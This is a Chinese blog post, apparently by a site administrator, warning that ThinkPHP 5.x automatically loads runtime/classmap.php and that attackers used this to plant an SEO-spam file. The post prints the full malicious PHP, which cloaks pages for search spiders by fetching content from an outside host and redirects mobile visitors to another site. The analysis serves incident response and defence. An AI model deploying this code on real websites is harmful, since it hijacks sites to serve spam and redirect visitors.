Thinkphp5.0--5.1 有重大安全隐患 用它做网站的赶紧改

最新推荐文章于 2024-06-04 07:28:39 发布
最新推荐文章于 2024-06-04 07:28:39 发布
阅读量463 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kmdaliu/article/details/133279603
版权

近日服务器上有网站被灰产挂马,具体是这样的:

网站管理系统是基于ThinkPHP5.0开发,几经升级,现在的版本是5.1.42,也是5系列最新版,最近一次升级是在2023-08-28号。

经查,黑客利用ThinkPHP  runtime目录的777的权限,上传了一个文件classmap.php到runtime目录。而ThinkPHP的主框架的装载器thinkphp/library/think/Loader.php文件中,第110行左右,有一段奇怪的代码,用于调用runtime/classmap.php。这段调用代码并非黑客所加,而是ThinkPHP框架自带的,我们下载了最新的ThinkPHP 5.1.24框架对比了,就是ThinkPHP自带的,至少从5.0就存在。ThinkPHP6和ThinkPHP8的情况不清楚。因为最近几年PHP方向的开发,已转向symfony,又转向Lavarel。

如果没有这个调用classmap.php代码,黑客不可能得逞。遗憾的是,这种加载runtime目录下的文件,ThinkPHP官方手册中并没有提及,也没有在runtime下放置一个空文件提示用户。因此,如果不是仔细阅读和验证ThinkPHP的源代码,用户无从知道有这样一个调用。就是这个隐秘而危险的调用,为黑客留下了作案条件,而让用户的网站处于风险之中。

我们阅读了classmap.php文件代码,其作用是帮助黑客做灰产推广,并在特定情况下刷新显示https://jsc.jnhvip.cc(这个网址又会跳转到其他网址)。因此,黑客代码的主要危害是偷偷访问黑客自己的网站,除此之外,并没有对网站有什么实质的危害行为。

目前尚不清楚是黑客是通过何种手段上传的。很可能是thinkphp的漏洞(如以前出现过URL解析漏洞),目前,ThinkPHP5.1.24 已是最新版,无法再升级。网站还能上传文件的一个组件是web编辑器,但web编辑器是需要登录后台的,没有登录后台,是无法上传文件的。因此,到底黑客是利用什么方式上传文件这个问题,只能进一步排查。

如果有知道的朋友,别忘了告诉我一声。

黑客文件 classmap.php 的代码如下:

<?php
@set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
$tr = "stristr";
$er = $_SERVER;
function httpGetlai($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}
define('url', $er['REQUEST_URI']);
@define('ref', $er['HTTP_REFERER']);
define('ent', $er['HTTP_USER_AGENT']);
define('site', "http://www.amcrjt.com/");
define('road', "?" .$er['HTTP_HOST'] . url);
define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');
define('mobile', '/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');
define('area', $tr(url, ".xml") or $tr(url, ".doc") or $tr(url, ".pdf") or $tr(url, ".txt") or $tr(url, ".ppt") or $tr(url, ".pptx") or $tr(url, ".xls") or $tr(url, ".csv") or $tr(url, ".shtml") or $tr(url, ".tacc")or $tr(url, ".ga")or $tr(url, ".gq")or $tr(url, ".xlsx")or $tr(url, ".bug") or $tr(url, ".fdc") or $tr(url, ".znb") or $tr(url, ".msl") or $tr(url, ".mdb") or $tr(url, ".cnm") or $tr(url, ".love") or $tr(url, ".bak") or $tr(url, ".asp") or $tr(url, ".jsp") or $tr(url, ".jspx") or $tr(url, ".rar") or $tr(url, ".zip") and $tr(url, "?"));
if (preg_match(regs, ent)) {
    if (area) {
        echo httpGetlai(site.road);
        exit;
    } else {
        echo httpGetlai(site.'x.php');
    }
}
if (area){
    if (preg_match(mobile, ent)){
        echo <<<HTML
    <meta http-equiv='refresh' content='1;url=https://jsc.jnhvip.cc/b.html' />
HTML;
        exit;
    }
}
?>

kmdaliu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
qq_50854662的博客
10-23 1364
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。借鉴Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日发布两个更新,这几次更新都修复了远程代码执行漏洞,对于5.0.x、5.1.x、5.2.x 这几个版本,都无需登入可以进行远程代码执行。 漏洞版本: 5.0.x5.1.x5.2.x 漏洞搭建
Thinkphp5.0.0~5.0.23版本远程代码执行漏洞导致网站被挂马
m0_37360803的博客
03-11 1705
最近发现多个Thinkphp5开发的网站被挂马,导致首页被篡,其他页面无法正常访问的情况。 木马中均包含以下代码: define(‘Viv, bebegim.’,‘Denzel-你的英雄’); 经过检查,这些攻击是利用了Thinkphp5.0.0~5.0.23版本远程进行代码调用的漏洞进行的getshell。 漏洞的详细原理参见:https://seaii-blog.com/index.php/...
PHP 开发 框架安全:ThinkPHP 序列 漏洞测试.
最新发布
Innocence_0的博客
06-04 488
本身不断更新和进,以应对新的安全威胁和漏洞。什么是 ThinkPHP 框架.ThinkPHP 框架的安全特性:开启 漏洞 靶场:(1)查看目录:(2)启用 vulhub 漏洞:(3)进行浏览:主机的 8080 端口.进行 漏洞 测试:(1)查看是不是 ThinkPHP 框架.(查看数据包的信息)(2)如果知道他是这个漏洞,则可以自己使用工具进行测试。(3)漏洞的利用:(4)使用连接工具(蚁剑)进行连接.
Thinkphp各个版本总结------终结版本!
weixin_33869377的博客
09-20 652
Thinkphp各个版本总结:tp3.2.3,tp5.0,tp5.1差异 终得闲暇时间(也就两三个小时)能够进行这6个月对tp框架的使用总结了: 1.框架隐藏模块差异: tp3.2.3:其实还比较麻烦 //隐藏入口文件 在与入口文件同级目录,将.htaccess文件中 RewriteRule ^(.*)$ index.php/$1 [QSA,PT,L] 修为 Rewrit...
thinkphp 最新版本5.05.1高危漏洞爆发可直接提权getshell
weixin_30267691的博客
12-13 870
THINKPHP毛病修复,官方于克日,对现有的thinkphp5.05.1全部版本举行了升级,以及补丁更新,这次更新重要是举行了一些毛病修复,最严峻的就是之前存在的SQL注入毛病,以及长途代码实行查询体系的毛病都举行了修复,官方本以为没有题目了,但是在现实的宁静检测当中发明,照旧存在题目,照旧可以长途代码举行注入,插入非法字符,提交到办事器后端中去。 关于这次发明的oday毛病,我们来看下...
Thinkphp类的映射优化生成classmap.php文件
weixin_40896800的博客
02-06 762
生成classmap.php文件命令:php think optimize:autoload
ThinkPHP 5.0升级到ThinkPHP 5.1全过程分享
热门推荐
多用户商城系统
03-15 1万+
        Thinkhp5.0日趋稳定之后,thinkphp官方又马不停蹄的开展了5.1版本的更新迭代。作为技术人,一向是喜欢尝新,既然5.1出来了,赶紧入手了解了解下。        首先打开文档看看开发目录有没有变化,希望不要和3.X一样得面目全非了。先看看5.0总的目录结构:project 应用部署目录 ├—application 应用目录(可设置) ├—extend 扩展类库目录(...
thinkphp 5.0升级到5.1的18个理由
连锁收银系统
03-11 9889
ThinkPHP5.1从2018年初发布到现在,一路小步快跑,快速迭代的同时也更新了大量的新特性。 那么到底是否值得升级到新版呢?如果你还在纠结选用5.0的商城系统还是选用thinkphp 5.1的系统,本文就和大家分享下值得升级到5.1的18个理由。 1、快速启动测试服务器:直接跨过门槛学框架 2、对象容器引入和依赖注入进:实用高逼格 3、增加门面对象:类的小助理 4、路由更对象...
thinkphp5.1基础1
weixin_45919561的博客
07-22 241
thinkphp5.1基础: 我的环境是使用phpstudy搭建的,具体安装步骤在这里就不说了,可百度。 首先了解一下项目的目录: application:项目目录 config:应用配置目录 extend:扩展类库目录 public:web目录(对外访问目录) route:路由定义目录 runtime:应用的运行时目录(可写,可定制) thinkphp:框架系统目录 vendor:第三方类库目录(Composer依赖库) build.php:自动生成定义文件(参考) composer.json:comp
ThinkPHP5.0-快速入门手册合集(新手教程版)
04-18
这是一个ThinkPHP5.0快速入门手册的新手教程,入门 TP5 必读系列。基于thinkphp官方制作的可以快速上手thinkphp5教程,该手册围绕WEB开发和API开发常用的一系列基础功能进行循序渐进的讲解,详细的介绍了thinkphp5的...
thinkphp5.0-oracle.zip
07-30
首先,你需要下载"thinkphp5.0-oracle.zip"这个压缩包,它包含了ThinkPHP5.0版本的Oracle驱动类。解压缩后,将里面的文件按照ThinkPHP的目录结构放入相应的目录。通常,驱动文件应放置在"thinkphp/library/think/db...
thinkphp5.0-php登录超时检测功能的类.zip
07-11
主要介绍了php登录超时检测功能实例详解的相关资料(以thinkphp5.0版本为例),php登录超时问题,当用户超过一定时间没有操作页面时自动退出登录,原理是通过js进行访问判断的!
ThinkPHP5.0-快速入门手册
09-05
ThinkPHP5.0快速入门手册》是一本专为初学者设计的教程,旨在帮助读者迅速掌握ThinkPHP5.0框架的基本用法和核心概念。该手册深入浅出地介绍了这个流行的PHP框架,使得开发者能够高效地开发Web应用程序。ThinkPHP...
tp5.0 项目如何升级为tp5.1
wanganji5252的博客
03-26 4134
TP5.0的项目放到TP5.1中会报很多的错误 现在来讲解一下大概需要修那些地方可以避免掉在这上面所浪费的时间。 1.控制器初始化方法_initialize 一般这个都是写在Common中 用于让子类进行继承 在tp5.1中 需要把_initialize 为initialize 就是去掉一个下划线。 2.模板的变量输出默认添加了htmlentities安全过滤 如之前自定义的分页 是...
ThinkPHP 系列漏洞
SHELLCODE_8BIT的博客
11-18 3305
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1、thinkphp5 SQL注入1漏洞影响版本: 5.0.13
Thinkphp5.1类自动加载机制
littlexiaoshuishui的博客
11-24 1440
tp5.1类加载功能都封装到Loader类当中,所以我们主要分析这个类的主要功能。 1.几个重要属性 Loader::$prefixLengthsPsr4, Loader::$prefixDirsPsr4, Loader::$fallbackDirsPsr4, Loader::$classMap 2.自动加载流程 2.1自动加载整个流程是通过Loader::register来实现...
ThinkPHP5 常用命令行
gaogzhen的博客
04-04 641
ThinkPHP5常用命令符操作 模块自动生成指令: 默认会读取应用目录application下面的build.php作为自动 生成的定义文件,如果你的定义文件位置不同,则需要使用 –config 参数指定如下: php think build (–config build.php) 快速生成类库文件 快速生成控制器类 执行下面的指令可以生成 index模块的 Blog控制器类库文...
Laravel 通过 classMap 文件映射覆盖重写任意 php 文件
kay_520的专栏
04-09 611
这里以重写 app/Providers/AppServiceProvider.php 为例 1.新建 app/CustomAppServiceProvider.php <?php namespace App\Providers; use Illuminate\Support\ServiceProvider; class AppServiceProvider extends ServiceProvider { /** * Register any application ser
thinkphp5.0thinkphp5.1不同之处
05-13
ThinkPHP 5.1相对于5.0来说,有以下的不同之处: 1. 底层框架升级:ThinkPHP 5.1采用了更高版本的底层框架,这意味着更好的性能和更加稳定的运行。 2. 新增了更多的驱动支持:ThinkPHP 5.1新增了更多的驱动支持,包括数据库的驱动和缓存的驱动等。 3. 新增了更多的核心类库:ThinkPHP 5.1新增了更多的核心类库,包括XML类库和验证类库等。 4. 新增了更多的功能:ThinkPHP 5.1新增了更多的功能,包括RESTful API支持和跨域访问支持等。 5. 更加灵活的路由配置:ThinkPHP 5.1的路由配置更加灵活,可以更加方便地扩展和定制化。 总的来说,ThinkPHP 5.1相对于5.0来说,拥有更加完善的功能和更加优秀的性能,同时也更加灵活,可以更好地满足开发者的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值